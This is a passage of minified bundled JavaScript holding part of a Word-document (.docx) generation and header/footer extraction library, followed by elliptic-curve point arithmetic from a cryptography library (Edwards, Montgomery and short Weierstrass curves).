toStream(Ce,nt){return this.compiler.compile(Ce,nt).generateNodeStream({type:"nodebuffer",streamFiles:!0,mimeType:"application/vnd.openxmlformats-officedocument.wordprocessingml.document",compression:"DEFLATE"})}}z_.compiler=new class{constructor(){this.formatter=new HM,this.imageReplacer=new sh,this.numberingReplacer=new ps}compile(Se,Ce){const nt=new L_,Dt=this.xmlifyFile(Se,Ce),di=new Map(Object.entries(Dt));for(const[,pi]of di)if(Array.isArray(pi))for(const Hi of pi)nt.file(Hi.path,Hi.data);else nt.file(pi.path,pi.data);for(const pi of Se.Media.Array)nt.file(`word/media/${pi.fileName}`,pi.stream);return nt}xmlifyFile(Se,Ce){const nt=Se.Document.Relationships.RelationshipCount+1,Dt=Br(this.formatter.format(Se.Document.View,{viewWrapper:Se.Document,file:Se}),{indent:Ce,declaration:{standalone:"yes",encoding:"UTF-8"}}),di=this.imageReplacer.getMediaData(Dt,Se.Media);return{Relationships:{data:(()=>(di.forEach((pi,Hi)=>{Se.Document.Relationships.createRelationship(nt+Hi,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/image",`media/${pi.fileName}`)}),Br(this.formatter.format(Se.Document.Relationships,{viewWrapper:Se.Document,file:Se}),{indent:Ce,declaration:{encoding:"UTF-8"}})))(),path:"word/_rels/document.xml.rels"},Document:{data:(()=>{const pi=this.imageReplacer.replace(Dt,di,nt);return this.numberingReplacer.replace(pi,Se.Numbering.ConcreteNumbering)})(),path:"word/document.xml"},Styles:{data:(()=>{const pi=Br(this.formatter.format(Se.Styles,{viewWrapper:Se.Document,file:Se}),{indent:Ce,declaration:{standalone:"yes",encoding:"UTF-8"}});return this.numberingReplacer.replace(pi,Se.Numbering.ConcreteNumbering)})(),path:"word/styles.xml"},Properties:{data:Br(this.formatter.format(Se.CoreProperties,{viewWrapper:Se.Document,file:Se}),{indent:Ce,declaration:{standalone:"yes",encoding:"UTF-8"}}),path:"docProps/core.xml"},Numbering:{data:Br(this.formatter.format(Se.Numbering,{viewWrapper:Se.Document,file:Se}),{indent:Ce,declaration:{standalone:"yes",encoding:"UTF-8"}}),path:"word/numbering.xml"},FileRelationships:{data:Br(this.formatter.format(Se.FileRelationships,{viewWrapper:Se.Document,file:Se}),{indent:Ce,declaration:{encoding:"UTF-8"}}),path:"_rels/.rels"},HeaderRelationships:Se.Headers.map((pi,Hi)=>{const pa=Br(this.formatter.format(pi.View,{viewWrapper:pi,file:Se}),{indent:Ce,declaration:{encoding:"UTF-8"}});return this.imageReplacer.getMediaData(pa,Se.Media).forEach((Ya,ca)=>{pi.Relationships.createRelationship(ca,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/image",`media/${Ya.fileName}`)}),{data:Br(this.formatter.format(pi.Relationships,{viewWrapper:pi,file:Se}),{indent:Ce,declaration:{encoding:"UTF-8"}}),path:`word/_rels/header${Hi+1}.xml.rels`}}),FooterRelationships:Se.Footers.map((pi,Hi)=>{const pa=Br(this.formatter.format(pi.View,{viewWrapper:pi,file:Se}),{indent:Ce,declaration:{encoding:"UTF-8"}});return this.imageReplacer.getMediaData(pa,Se.Media).forEach((Ya,ca)=>{pi.Relationships.createRelationship(ca,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/image",`media/${Ya.fileName}`)}),{data:Br(this.formatter.format(pi.Relationships,{viewWrapper:pi,file:Se}),{indent:Ce,declaration:{encoding:"UTF-8"}}),path:`word/_rels/footer${Hi+1}.xml.rels`}}),Headers:Se.Headers.map((pi,Hi)=>{const pa=Br(this.formatter.format(pi.View,{viewWrapper:pi,file:Se}),{indent:Ce,declaration:{encoding:"UTF-8"}}),Ya=this.imageReplacer.getMediaData(pa,Se.Media),ca=this.imageReplacer.replace(pa,Ya,0);return{data:this.numberingReplacer.replace(ca,Se.Numbering.ConcreteNumbering),path:`word/header${Hi+1}.xml`}}),Footers:Se.Footers.map((pi,Hi)=>{const pa=Br(this.formatter.format(pi.View,{viewWrapper:pi,file:Se}),{indent:Ce,declaration:{encoding:"UTF-8"}}),Ya=this.imageReplacer.getMediaData(pa,Se.Media),ca=this.imageReplacer.replace(pa,Ya,0);return{data:this.numberingReplacer.replace(ca,Se.Numbering.ConcreteNumbering),path:`word/footer${Hi+1}.xml`}}),ContentTypes:{data:Br(this.formatter.format(Se.ContentTypes,{viewWrapper:Se.Document,file:Se}),{indent:Ce,declaration:{encoding:"UTF-8"}}),path:"[Content_Types].xml"},CustomProperties:{data:Br(this.formatter.format(Se.CustomProperties,{viewWrapper:Se.Document,file:Se}),{indent:Ce,declaration:{standalone:"yes",encoding:"UTF-8"}}),path:"docProps/custom.xml"},AppProperties:{data:Br(this.formatter.format(Se.AppProperties,{viewWrapper:Se.Document,file:Se}),{indent:Ce,declaration:{standalone:"yes",encoding:"UTF-8"}}),path:"docProps/app.xml"},FootNotes:{data:Br(this.formatter.format(Se.FootNotes.View,{viewWrapper:Se.FootNotes,file:Se}),{indent:Ce,declaration:{encoding:"UTF-8"}}),path:"word/footnotes.xml"},FootNotesRelationships:{data:Br(this.formatter.format(Se.FootNotes.Relationships,{viewWrapper:Se.FootNotes,file:Se}),{indent:Ce,declaration:{encoding:"UTF-8"}}),path:"word/_rels/footnotes.xml.rels"},Settings:{data:Br(this.formatter.format(Se.Settings,{viewWrapper:Se.Document,file:Se}),{indent:Ce,declaration:{standalone:"yes",encoding:"UTF-8"}}),path:"word/settings.xml"},Comments:{data:Br(this.formatter.format(Se.Comments,{viewWrapper:Se.Document,file:Se}),{indent:Ce,declaration:{standalone:"yes",encoding:"UTF-8"}}),path:"word/comments.xml"}}}};var hd=function(Se,Ce,nt,Dt){return new(nt||(nt=Promise))(function(di,pi){function Hi(ca){try{Ya(Dt.next(ca))}catch(ka){pi(ka)}}function pa(ca){try{Ya(Dt.throw(ca))}catch(ka){pi(ka)}}function Ya(ca){var ka;ca.done?di(ca.value):(ka=ca.value,ka instanceof nt?ka:new nt(function(Dr){Dr(ka)})).then(Hi,pa)}Ya((Dt=Dt.apply(Se,Ce||[])).next())})};const N0={"http://schemas.openxmlformats.org/officeDocument/2006/relationships/header":"header","http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer":"footer","http://schemas.openxmlformats.org/officeDocument/2006/relationships/image":"image","http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink":"hyperlink"};var lh;!function(Se){Se.HEADER="header",Se.FOOTER="footer",Se.IMAGE="image",Se.HYPERLINK="hyperlink"}(lh||(lh={}));class bC{extract(Ce){return hd(this,void 0,void 0,function*(){const nt=yield L_.loadAsync(Ce),Dt=yield nt.files["word/document.xml"].async("text"),di=yield nt.files["word/_rels/document.xml.rels"].async("text"),pi=this.extractDocumentRefs(Dt),Hi=this.findReferenceFiles(di),pa=new ld;return{headers:yield this.createHeaders(nt,pi,Hi,pa,0),footers:yield this.createFooters(nt,pi,Hi,pa,pi.headers.length),currentRelationshipId:pi.footers.length+pi.headers.length,styles:yield nt.files["word/styles.xml"].async("text"),titlePageIsDefined:this.checkIfTitlePageIsDefined(Dt),media:pa}})}createFooters(Ce,nt,Dt,di,pi){return hd(this,void 0,void 0,function*(){const Hi=nt.footers.map((pa,Ya)=>hd(this,void 0,void 0,function*(){const ca=Dt.find(At=>At.id===pa.id);if(null===ca||!ca)throw new Error(`Can not find target file for id ${pa.id}`);const ka=yield Ce.files[`word/${ca.target}`].async("text"),Dr=(0,y.xml2js)(ka,{compact:!1,captureSpacesBetweenElements:!0});if(!Dr.elements)return;const Ao=Dr.elements.reduce((At,gc)=>"w:ftr"===gc.name?gc:At),rr=M(Ao),Wc=new fl(di,pi+Ya,rr);return yield this.addRelationshipToWrapper(ca,Ce,Wc,di),{type:pa.type,footer:Wc}})).filter(pa=>!!pa);return Promise.all(Hi)})}createHeaders(Ce,nt,Dt,di,pi){return hd(this,void 0,void 0,function*(){const Hi=nt.headers.map((pa,Ya)=>hd(this,void 0,void 0,function*(){const ca=Dt.find(At=>At.id===pa.id);if(null===ca||!ca)throw new Error(`Can not find target file for id ${pa.id}`);const ka=yield Ce.files[`word/${ca.target}`].async("text"),Dr=(0,y.xml2js)(ka,{compact:!1,captureSpacesBetweenElements:!0});if(!Dr.elements)return;const Ao=Dr.elements.reduce((At,gc)=>"w:hdr"===gc.name?gc:At),rr=M(Ao),Wc=new _l(di,pi+Ya,rr);return yield this.addRelationshipToWrapper(ca,Ce,Wc,di),{type:pa.type,header:Wc}})).filter(pa=>!!pa);return Promise.all(Hi)})}addRelationshipToWrapper(Ce,nt,Dt,di){return hd(this,void 0,void 0,function*(){const pi=nt.files[`word/_rels/${Ce.target}.rels`];if(!pi)return;const Hi=yield pi.async("text"),pa=this.findReferenceFiles(Hi).filter(ca=>ca.type===lh.IMAGE),Ya=this.findReferenceFiles(Hi).filter(ca=>ca.type===lh.HYPERLINK);for(const ca of pa){const ka=L_.support.arraybuffer?"arraybuffer":"nodebuffer",Dr=yield nt.files[`word/${ca.target}`].async(ka),Ao=di.addMedia(Dr,{width:100,height:100});Dt.Relationships.createRelationship(ca.id,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/image",`media/${Ao.fileName}`)}for(const ca of Ya)Dt.Relationships.createRelationship(ca.id,"http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink",ca.target,ti.EXTERNAL)})}findReferenceFiles(Ce){const nt=(0,y.xml2js)(Ce,{compact:!0});return(Array.isArray(nt.Relationships.Relationship)?nt.Relationships.Relationship:[nt.Relationships.Relationship]).map(Dt=>{if(void 0===Dt._attributes)throw Error("relationship element has no attributes");return{id:this.parseRefId(Dt._attributes.Id),type:N0[Dt._attributes.Type],target:Dt._attributes.Target}}).filter(Dt=>null!==Dt.type)}extractDocumentRefs(Ce){const nt=(0,y.xml2js)(Ce,{compact:!0})["w:document"]["w:body"]["w:sectPr"],Dt=nt["w:headerReference"];let di;di=void 0===Dt?[]:Array.isArray(Dt)?Dt:[Dt];const pi=di.map(Ya=>{if(void 0===Ya._attributes)throw Error("header reference element has no attributes");return{type:Ya._attributes["w:type"],id:this.parseRefId(Ya._attributes["r:id"])}}),Hi=nt["w:footerReference"];let pa;return pa=void 0===Hi?[]:Array.isArray(Hi)?Hi:[Hi],{headers:pi,footers:pa.map(Ya=>{if(void 0===Ya._attributes)throw Error("footer reference element has no attributes");return{type:Ya._attributes["w:type"],id:this.parseRefId(Ya._attributes["r:id"])}})}}checkIfTitlePageIsDefined(Ce){return void 0!==(0,y.xml2js)(Ce,{compact:!0})["w:document"]["w:body"]["w:sectPr"]["w:titlePg"]}parseRefId(Ce){const nt=/^rId(\d+)$/.exec(Ce);if(null===nt)throw new Error("Invalid ref id");return parseInt(nt[1],10)}}var tr=ae(5575)})(),I})(),Pe.exports=$()},1875:(Pe,we,de)=>{"use strict";var ie=we;ie.version=de(193).i8,ie.utils=de(7e3),ie.rand=de(9598),ie.curve=de(6186),ie.curves=de(1915),ie.ec=de(7949),ie.eddsa=de(8593)},3654:(Pe,we,de)=>{"use strict";var ie=de(1959),j=de(7e3),$=j.getNAF,ae=j.getJSF,I=j.assert;function Q(E,g){this.type=E,this.p=new ie(g.p,16),this.red=g.prime?ie.red(g.prime):ie.mont(this.p),this.zero=new ie(0).toRed(this.red),this.one=new ie(1).toRed(this.red),this.two=new ie(2).toRed(this.red),this.n=g.n&&new ie(g.n,16),this.g=g.g&&this.pointFromJSON(g.g,g.gRed),this._wnafT1=new Array(4),this._wnafT2=new Array(4),this._wnafT3=new Array(4),this._wnafT4=new Array(4),this._bitLength=this.n?this.n.bitLength():0;var b=this.n&&this.p.div(this.n);!b||b.cmpn(100)>0?this.redN=null:(this._maxwellTrick=!0,this.redN=this.n.toRed(this.red))}function F(E,g){this.curve=E,this.type=g,this.precomputed=null}Pe.exports=Q,Q.prototype.point=function(){throw new Error("Not implemented")},Q.prototype.validate=function(){throw new Error("Not implemented")},Q.prototype._fixedNafMul=function(g,b){I(g.precomputed);var _=g._getDoubles(),y=$(b,1,this._bitLength),M=(1<<_.step+1)-(_.step%2==0?2:1);M/=3;var D,w,p=[];for(D=0;D<y.length;D+=_.step){w=0;for(var x=D+_.step-1;x>=D;x--)w=(w<<1)+y[x];p.push(w)}for(var S=this.jpoint(null,null,null),O=this.jpoint(null,null,null),U=M;U>0;U--){for(D=0;D<p.length;D++)(w=p[D])===U?O=O.mixedAdd(_.points[D]):w===-U&&(O=O.mixedAdd(_.points[D].neg()));S=S.add(O)}return S.toP()},Q.prototype._wnafMul=function(g,b){for(var _=4,y=g._getNAFPoints(_),M=y.points,p=$(b,_=y.wnd,this._bitLength),D=this.jpoint(null,null,null),w=p.length-1;w>=0;w--){for(var x=0;w>=0&&0===p[w];w--)x++;if(w>=0&&x++,D=D.dblp(x),w<0)break;var S=p[w];I(0!==S),D="affine"===g.type?D.mixedAdd(S>0?M[S-1>>1]:M[-S-1>>1].neg()):D.add(S>0?M[S-1>>1]:M[-S-1>>1].neg())}return"affine"===g.type?D.toP():D},Q.prototype._wnafMulAdd=function(g,b,_,y,M){var S,O,U,p=this._wnafT1,D=this._wnafT2,w=this._wnafT3,x=0;for(S=0;S<y;S++){var K=(U=b[S])._getNAFPoints(g);p[S]=K.wnd,D[S]=K.points}for(S=y-1;S>=1;S-=2){var ee=S-1,se=S;if(1===p[ee]&&1===p[se]){var ve=[b[ee],null,null,b[se]];0===b[ee].y.cmp(b[se].y)?(ve[1]=b[ee].add(b[se]),ve[2]=b[ee].toJ().mixedAdd(b[se].neg())):0===b[ee].y.cmp(b[se].y.redNeg())?(ve[1]=b[ee].toJ().mixedAdd(b[se]),ve[2]=b[ee].add(b[se].neg())):(ve[1]=b[ee].toJ().mixedAdd(b[se]),ve[2]=b[ee].toJ().mixedAdd(b[se].neg()));var le=[-3,-1,-5,-7,0,7,5,1,3],ye=ae(_[ee],_[se]);for(x=Math.max(ye[0].length,x),w[ee]=new Array(x),w[se]=new Array(x),O=0;O<x;O++)w[ee][O]=le[3*(1+(0|ye[0][O]))+(1+(0|ye[1][O]))],w[se][O]=0,D[ee]=ve}else w[ee]=$(_[ee],p[ee],this._bitLength),w[se]=$(_[se],p[se],this._bitLength),x=Math.max(w[ee].length,x),x=Math.max(w[se].length,x)}var f=this.jpoint(null,null,null),A=this._wnafT4;for(S=x;S>=0;S--){for(var v=0;S>=0;){var P=!0;for(O=0;O<y;O++)A[O]=0|w[O][S],0!==A[O]&&(P=!1);if(!P)break;v++,S--}if(S>=0&&v++,f=f.dblp(v),S<0)break;for(O=0;O<y;O++){var G=A[O];0!==G&&(G>0?U=D[O][G-1>>1]:G<0&&(U=D[O][-G-1>>1].neg()),f="affine"===U.type?f.mixedAdd(U):f.add(U))}}for(S=0;S<y;S++)D[S]=null;return M?f:f.toP()},Q.BasePoint=F,F.prototype.eq=function(){throw new Error("Not implemented")},F.prototype.validate=function(){return this.curve.validate(this)},Q.prototype.decodePoint=function(g,b){g=j.toArray(g,b);var _=this.p.byteLength();if((4===g[0]||6===g[0]||7===g[0])&&g.length-1==2*_)return 6===g[0]?I(g[g.length-1]%2==0):7===g[0]&&I(g[g.length-1]%2==1),this.point(g.slice(1,1+_),g.slice(1+_,1+2*_));if((2===g[0]||3===g[0])&&g.length-1===_)return this.pointFromX(g.slice(1,1+_),3===g[0]);throw new Error("Unknown point format")},F.prototype.encodeCompressed=function(g){return this.encode(g,!0)},F.prototype._encode=function(g){var b=this.curve.p.byteLength(),_=this.getX().toArray("be",b);return g?[this.getY().isEven()?2:3].concat(_):[4].concat(_,this.getY().toArray("be",b))},F.prototype.encode=function(g,b){return j.encode(this._encode(b),g)},F.prototype.precompute=function(g){if(this.precomputed)return this;var b={doubles:null,naf:null,beta:null};return b.naf=this._getNAFPoints(8),b.doubles=this._getDoubles(4,g),b.beta=this._getBeta(),this.precomputed=b,this},F.prototype._hasDoubles=function(g){if(!this.precomputed)return!1;var b=this.precomputed.doubles;return!!b&&b.points.length>=Math.ceil((g.bitLength()+1)/b.step)},F.prototype._getDoubles=function(g,b){if(this.precomputed&&this.precomputed.doubles)return this.precomputed.doubles;for(var _=[this],y=this,M=0;M<b;M+=g){for(var p=0;p<g;p++)y=y.dbl();_.push(y)}return{step:g,points:_}},F.prototype._getNAFPoints=function(g){if(this.precomputed&&this.precomputed.naf)return this.precomputed.naf;for(var b=[this],_=(1<<g)-1,y=1===_?null:this.dbl(),M=1;M<_;M++)b[M]=b[M-1].add(y);return{wnd:g,points:b}},F.prototype._getBeta=function(){return null},F.prototype.dblp=function(g){for(var b=this,_=0;_<g;_++)b=b.dbl();return b}},6718:(Pe,we,de)=>{"use strict";var ie=de(7e3),j=de(1959),$=de(2270),ae=de(3654),I=ie.assert;function Q(E){this.twisted=1!=(0|E.a),this.mOneA=this.twisted&&-1==(0|E.a),this.extended=this.mOneA,ae.call(this,"edwards",E),this.a=new j(E.a,16).umod(this.red.m),this.a=this.a.toRed(this.red),this.c=new j(E.c,16).toRed(this.red),this.c2=this.c.redSqr(),this.d=new j(E.d,16).toRed(this.red),this.dd=this.d.redAdd(this.d),I(!this.twisted||0===this.c.fromRed().cmpn(1)),this.oneC=1==(0|E.c)}function F(E,g,b,_,y){ae.BasePoint.call(this,E,"projective"),null===g&&null===b&&null===_?(this.x=this.curve.zero,this.y=this.curve.one,this.z=this.curve.one,this.t=this.curve.zero,this.zOne=!0):(this.x=new j(g,16),this.y=new j(b,16),this.z=_?new j(_,16):this.curve.one,this.t=y&&new j(y,16),this.x.red||(this.x=this.x.toRed(this.curve.red)),this.y.red||(this.y=this.y.toRed(this.curve.red)),this.z.red||(this.z=this.z.toRed(this.curve.red)),this.t&&!this.t.red&&(this.t=this.t.toRed(this.curve.red)),this.zOne=this.z===this.curve.one,this.curve.extended&&!this.t&&(this.t=this.x.redMul(this.y),this.zOne||(this.t=this.t.redMul(this.z.redInvm()))))}$(Q,ae),Pe.exports=Q,Q.prototype._mulA=function(g){return this.mOneA?g.redNeg():this.a.redMul(g)},Q.prototype._mulC=function(g){return this.oneC?g:this.c.redMul(g)},Q.prototype.jpoint=function(g,b,_,y){return this.point(g,b,_,y)},Q.prototype.pointFromX=function(g,b){(g=new j(g,16)).red||(g=g.toRed(this.red));var _=g.redSqr(),y=this.c2.redSub(this.a.redMul(_)),M=this.one.redSub(this.c2.redMul(this.d).redMul(_)),p=y.redMul(M.redInvm()),D=p.redSqrt();if(0!==D.redSqr().redSub(p).cmp(this.zero))throw new Error("invalid point");var w=D.fromRed().isOdd();return(b&&!w||!b&&w)&&(D=D.redNeg()),this.point(g,D)},Q.prototype.pointFromY=function(g,b){(g=new j(g,16)).red||(g=g.toRed(this.red));var _=g.redSqr(),y=_.redSub(this.c2),M=_.redMul(this.d).redMul(this.c2).redSub(this.a),p=y.redMul(M.redInvm());if(0===p.cmp(this.zero)){if(b)throw new Error("invalid point");return this.point(this.zero,g)}var D=p.redSqrt();if(0!==D.redSqr().redSub(p).cmp(this.zero))throw new Error("invalid point");return D.fromRed().isOdd()!==b&&(D=D.redNeg()),this.point(D,g)},Q.prototype.validate=function(g){if(g.isInfinity())return!0;g.normalize();var b=g.x.redSqr(),_=g.y.redSqr(),y=b.redMul(this.a).redAdd(_),M=this.c2.redMul(this.one.redAdd(this.d.redMul(b).redMul(_)));return 0===y.cmp(M)},$(F,ae.BasePoint),Q.prototype.pointFromJSON=function(g){return F.fromJSON(this,g)},Q.prototype.point=function(g,b,_,y){return new F(this,g,b,_,y)},F.fromJSON=function(g,b){return new F(g,b[0],b[1],b[2])},F.prototype.inspect=function(){return this.isInfinity()?"<EC Point Infinity>":"<EC Point x: "+this.x.fromRed().toString(16,2)+" y: "+this.y.fromRed().toString(16,2)+" z: "+this.z.fromRed().toString(16,2)+">"},F.prototype.isInfinity=function(){return 0===this.x.cmpn(0)&&(0===this.y.cmp(this.z)||this.zOne&&0===this.y.cmp(this.curve.c))},F.prototype._extDbl=function(){var g=this.x.redSqr(),b=this.y.redSqr(),_=this.z.redSqr();_=_.redIAdd(_);var y=this.curve._mulA(g),M=this.x.redAdd(this.y).redSqr().redISub(g).redISub(b),p=y.redAdd(b),D=p.redSub(_),w=y.redSub(b),x=M.redMul(D),S=p.redMul(w),O=M.redMul(w),U=D.redMul(p);return this.curve.point(x,S,U,O)},F.prototype._projDbl=function(){var y,M,p,D,w,x,g=this.x.redAdd(this.y).redSqr(),b=this.x.redSqr(),_=this.y.redSqr();if(this.curve.twisted){var S=(D=this.curve._mulA(b)).redAdd(_);this.zOne?(y=g.redSub(b).redSub(_).redMul(S.redSub(this.curve.two)),M=S.redMul(D.redSub(_)),p=S.redSqr().redSub(S).redSub(S)):(w=this.z.redSqr(),x=S.redSub(w).redISub(w),y=g.redSub(b).redISub(_).redMul(x),M=S.redMul(D.redSub(_)),p=S.redMul(x))}else D=b.redAdd(_),w=this.curve._mulC(this.z).redSqr(),x=D.redSub(w).redSub(w),y=this.curve._mulC(g.redISub(D)).redMul(x),M=this.curve._mulC(D).redMul(b.redISub(_)),p=D.redMul(x);return this.curve.point(y,M,p)},F.prototype.dbl=function(){return this.isInfinity()?this:this.curve.extended?this._extDbl():this._projDbl()},F.prototype._extAdd=function(g){var b=this.y.redSub(this.x).redMul(g.y.redSub(g.x)),_=this.y.redAdd(this.x).redMul(g.y.redAdd(g.x)),y=this.t.redMul(this.curve.dd).redMul(g.t),M=this.z.redMul(g.z.redAdd(g.z)),p=_.redSub(b),D=M.redSub(y),w=M.redAdd(y),x=_.redAdd(b),S=p.redMul(D),O=w.redMul(x),U=p.redMul(x),K=D.redMul(w);return this.curve.point(S,O,K,U)},F.prototype._projAdd=function(g){var O,U,b=this.z.redMul(g.z),_=b.redSqr(),y=this.x.redMul(g.x),M=this.y.redMul(g.y),p=this.curve.d.redMul(y).redMul(M),D=_.redSub(p),w=_.redAdd(p),x=this.x.redAdd(this.y).redMul(g.x.redAdd(g.y)).redISub(y).redISub(M),S=b.redMul(D).redMul(x);return this.curve.twisted?(O=b.redMul(w).redMul(M.redSub(this.curve._mulA(y))),U=D.redMul(w)):(O=b.redMul(w).redMul(M.redSub(y)),U=this.curve._mulC(D).redMul(w)),this.curve.point(S,O,U)},F.prototype.add=function(g){return this.isInfinity()?g:g.isInfinity()?this:this.curve.extended?this._extAdd(g):this._projAdd(g)},F.prototype.mul=function(g){return this._hasDoubles(g)?this.curve._fixedNafMul(this,g):this.curve._wnafMul(this,g)},F.prototype.mulAdd=function(g,b,_){return this.curve._wnafMulAdd(1,[this,b],[g,_],2,!1)},F.prototype.jmulAdd=function(g,b,_){return this.curve._wnafMulAdd(1,[this,b],[g,_],2,!0)},F.prototype.normalize=function(){if(this.zOne)return this;var g=this.z.redInvm();return this.x=this.x.redMul(g),this.y=this.y.redMul(g),this.t&&(this.t=this.t.redMul(g)),this.z=this.curve.one,this.zOne=!0,this},F.prototype.neg=function(){return this.curve.point(this.x.redNeg(),this.y,this.z,this.t&&this.t.redNeg())},F.prototype.getX=function(){return this.normalize(),this.x.fromRed()},F.prototype.getY=function(){return this.normalize(),this.y.fromRed()},F.prototype.eq=function(g){return this===g||0===this.getX().cmp(g.getX())&&0===this.getY().cmp(g.getY())},F.prototype.eqXToP=function(g){var b=g.toRed(this.curve.red).redMul(this.z);if(0===this.x.cmp(b))return!0;for(var _=g.clone(),y=this.curve.redN.redMul(this.z);;){if(_.iadd(this.curve.n),_.cmp(this.curve.p)>=0)return!1;if(b.redIAdd(y),0===this.x.cmp(b))return!0}},F.prototype.toP=F.prototype.normalize,F.prototype.mixedAdd=F.prototype.add},6186:(Pe,we,de)=>{"use strict";var ie=we;ie.base=de(3654),ie.short=de(396),ie.mont=de(8217),ie.edwards=de(6718)},8217:(Pe,we,de)=>{"use strict";var ie=de(1959),j=de(2270),$=de(3654),ae=de(7e3);function I(F){$.call(this,"mont",F),this.a=new ie(F.a,16).toRed(this.red),this.b=new ie(F.b,16).toRed(this.red),this.i4=new ie(4).toRed(this.red).redInvm(),this.two=new ie(2).toRed(this.red),this.a24=this.i4.redMul(this.a.redAdd(this.two))}function Q(F,E,g){$.BasePoint.call(this,F,"projective"),null===E&&null===g?(this.x=this.curve.one,this.z=this.curve.zero):(this.x=new ie(E,16),this.z=new ie(g,16),this.x.red||(this.x=this.x.toRed(this.curve.red)),this.z.red||(this.z=this.z.toRed(this.curve.red)))}j(I,$),Pe.exports=I,I.prototype.validate=function(E){var g=E.normalize().x,b=g.redSqr(),_=b.redMul(g).redAdd(b.redMul(this.a)).redAdd(g);return 0===_.redSqrt().redSqr().cmp(_)},j(Q,$.BasePoint),I.prototype.decodePoint=function(E,g){return this.point(ae.toArray(E,g),1)},I.prototype.point=function(E,g){return new Q(this,E,g)},I.prototype.pointFromJSON=function(E){return Q.fromJSON(this,E)},Q.prototype.precompute=function(){},Q.prototype._encode=function(){return this.getX().toArray("be",this.curve.p.byteLength())},Q.fromJSON=function(E,g){return new Q(E,g[0],g[1]||E.one)},Q.prototype.inspect=function(){return this.isInfinity()?"<EC Point Infinity>":"<EC Point x: "+this.x.fromRed().toString(16,2)+" z: "+this.z.fromRed().toString(16,2)+">"},Q.prototype.isInfinity=function(){return 0===this.z.cmpn(0)},Q.prototype.dbl=function(){var g=this.x.redAdd(this.z).redSqr(),_=this.x.redSub(this.z).redSqr(),y=g.redSub(_),M=g.redMul(_),p=y.redMul(_.redAdd(this.curve.a24.redMul(y)));return this.curve.point(M,p)},Q.prototype.add=function(){throw new Error("Not supported on Montgomery curve")},Q.prototype.diffAdd=function(E,g){var b=this.x.redAdd(this.z),_=this.x.redSub(this.z),y=E.x.redAdd(E.z),p=E.x.redSub(E.z).redMul(b),D=y.redMul(_),w=g.z.redMul(p.redAdd(D).redSqr()),x=g.x.redMul(p.redISub(D).redSqr());return this.curve.point(w,x)},Q.prototype.mul=function(E){for(var g=E.clone(),b=this,_=this.curve.point(null,null),M=[];0!==g.cmpn(0);g.iushrn(1))M.push(g.andln(1));for(var p=M.length-1;p>=0;p--)0===M[p]?(b=b.diffAdd(_,this),_=_.dbl()):(_=b.diffAdd(_,this),b=b.dbl());return _},Q.prototype.mulAdd=function(){throw new Error("Not supported on Montgomery curve")},Q.prototype.jumlAdd=function(){throw new Error("Not supported on Montgomery curve")},Q.prototype.eq=function(E){return 0===this.getX().cmp(E.getX())},Q.prototype.normalize=function(){return this.x=this.x.redMul(this.z.redInvm()),this.z=this.curve.one,this},Q.prototype.getX=function(){return this.normalize(),this.x.fromRed()}},396:(Pe,we,de)=>{"use strict";var ie=de(7e3),j=de(1959),$=de(2270),ae=de(3654),I=ie.assert;function Q(g){ae.call(this,"short",g),this.a=new j(g.a,16).toRed(this.red),this.b=new j(g.b,16).toRed(this.red),this.tinv=this.two.redInvm(),this.zeroA=0===this.a.fromRed().cmpn(0),this.threeA=0===this.a.fromRed().sub(this.p).cmpn(-3),this.endo=this._getEndomorphism(g),this._endoWnafT1=new Array(4),this._endoWnafT2=new Array(4)}function F(g,b,_,y){ae.BasePoint.call(this,g,"affine"),null===b&&null===_?(this.x=null,this.y=null,this.inf=!0):(this.x=new j(b,16),this.y=new j(_,16),y&&(this.x.forceRed(this.curve.red),this.y.forceRed(this.curve.red)),this.x.red||(this.x=this.x.toRed(this.curve.red)),this.y.red||(this.y=this.y.toRed(this.curve.red)),this.inf=!1)}function E(g,b,_,y){ae.BasePoint.call(this,g,"jacobian"),null===b&&null===_&&null===y?(this.x=this.curve.one,this.y=this.curve.one,this.z=new j(0)):(this.x=new j(b,16),this.y=new j(_,16),this.z=new j(y,16)),this.x.red||(this.x=this.x.toRed(this.curve.red)),this.y.red||(this.y=this.y.toRed(this.curve.red)),this.z.red||(this.z=this.z.toRed(this.curve.red)),this.zOne=this.z===this.curve.one}$(Q,ae),Pe.exports=Q,Q.prototype._getEndomorphism=function(b){if(this.zeroA&&this.g&&this.n&&1===this.p.modn(3)){var _,y;if(b.beta)_=new j(b.beta,16).toRed(this.red);else{var M=this._getEndoRoots(this.p);_=(_=M[0].cmp(M[1])<0?M[0]:M[1]).toRed(this.red)}if(b.lambda)y=new j(b.lambda,16);else{var p=this._getEndoRoots(this.n);0===this.g.mul(p[0]).x.cmp(this.g.x.redMul(_))?y=p[0]:I(0===this.g.mul(y=p[1]).x.cmp(this.g.x.redMul(_)))}return{beta:_,lambda:y,basis:b.basis?b.basis.map(function(w){return{a:new j(w.a,16),b:new j(w.b,16)}}):this._getEndoBasis(y)}}},Q.prototype._getEndoRoots=function(b){var _=b===this.p?this.red:j.mont(b),y=new j(2).toRed(_).redInvm(),M=y.redNeg(),p=new j(3).toRed(_).redNeg().redSqrt().redMul(y);return[M.redAdd(p).fromRed(),M.redSub(p).fromRed()]},Q.prototype._getEndoBasis=function(b){for(var S,O,U,K,ee,se,ve,ye,z,_=this.n.ushrn(Math.floor(this.n.bitLength()/2)),y=b,M=this.n.clone(),p=new j(1),D=new j(0),w=new j(0),x=new j(1),le=0;0!==y.cmpn(0);){var l=M.div(y);ye=M.sub(l.mul(y)),z=w.sub(l.mul(p));var f=x.sub(l.mul(D));if(!U&&ye.cmp(_)<0)S=ve.neg(),O=p,U=ye.neg(),K=z;else if(U&&2==++le)break;ve=ye,M=y,y=ye,w=p,p=z,x=D,D=f}ee=ye.neg(),se=z;var A=U.sqr().add(K.sqr());return ee.sqr().add(se.sqr()).cmp(A)>=0&&(ee=S,se=O),U.negative&&(U=U.neg(),K=K.neg()),ee.negative&&(ee=ee.neg(),se=se.neg()),[{a:U,b:K},{a:ee,b:se}]},Q.prototype._endoSplit=function(b){var 